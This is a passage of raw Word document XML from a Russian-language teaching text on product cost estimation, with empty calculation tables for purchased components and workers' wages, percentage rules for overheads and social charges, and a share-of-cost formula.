                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Наименование материала</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Единица измерения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Цена единицы, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Норма расхода на изделие</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Стоимость, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00B012EC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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1620"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1643"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r>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>ИТОГО:</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1620"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1643"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r>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 9</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет стоимости комплектующих покупных изделий и полуфабрикатов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="8984" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1715"/>
        <w:gridCol w:w="1930"/>
        <w:gridCol w:w="1562"/>
        <w:gridCol w:w="1835"/>
        <w:gridCol w:w="1942"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Наименование </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Единица измерения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1620" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Цена единицы, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1643" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Применяемость </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Стоимость, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00B012EC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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1620"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1643"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r>
      <w:tr w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidTr="00D84D30">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1667" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>ИТОГО:</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1620"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1643"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c>
          <w:tcPr>
            <w:tcW w:w="2027" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В стоимости материалов и покупных изделий должны учитываться транспортно-заготовительные расходы в размере 10-15% от их стоимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стоимость возвратных отходов может быть принята в размере 5-20% от стоимости материалов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основная заработная плата производственных рабочих определяется на основе трудоемкости работ и часовых тарифных ставок. Исходные данные и результаты расчетов вносятся в табл. 10.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 10</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет основной заработной платы производственных рабочих</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9523" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2008"/>
        <w:gridCol w:w="1721"/>
        <w:gridCol w:w="1643"/>
        <w:gridCol w:w="1650"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="1162"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2093" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Вид работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Трудоемкость, нормо-часы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Средний разряд работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1690" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Часовая тарифная ставка, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Основная заработная плата, руб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2093" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidTr="00137383">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2093" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>ИТОГО</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1690" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дополнительная заработная плата может быть принята в размере 10…15% от основной, а отчисления на социальные нужды – 35,6% от основной и дополнительной заработной платы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Накладные расходы определяются в процентах от основной заработной платы в размере 250-350%.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При использовании метода удельных весов себестоимость проектируемого изделия может быть установлена на основе расчета одной (нескольких) из статей прямых затрат (затрат на материалы и покупные изделия, заработная плата производственных рабочих) и удельного веса этой статьи (статей) в полной себестоимости аналогичных изделий. В этом случае себестоимость проектируемого изделия может быть определена по формуле</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="693750" cy="319150"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27245" name="Рисунок 448" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image018.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId464" cstate="print"/>
                    <a:srcRect b="14667"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="693750" cy="319150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где: S</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- затраты по рассчитываемой статье, руб.;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>У</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- удельный вес этой статьи в себестоимости аналогичных изделий, % (принимается по данным предприятий, Приложения 2 и других источников).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Приближенное значение Р годовых эксплуатационных затрат может быть получено по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ЭР = С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>г,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где: Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, - годовой объем продаж изделий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет инвестиционных затрат</w:t>
      </w:r>
    </w:p>
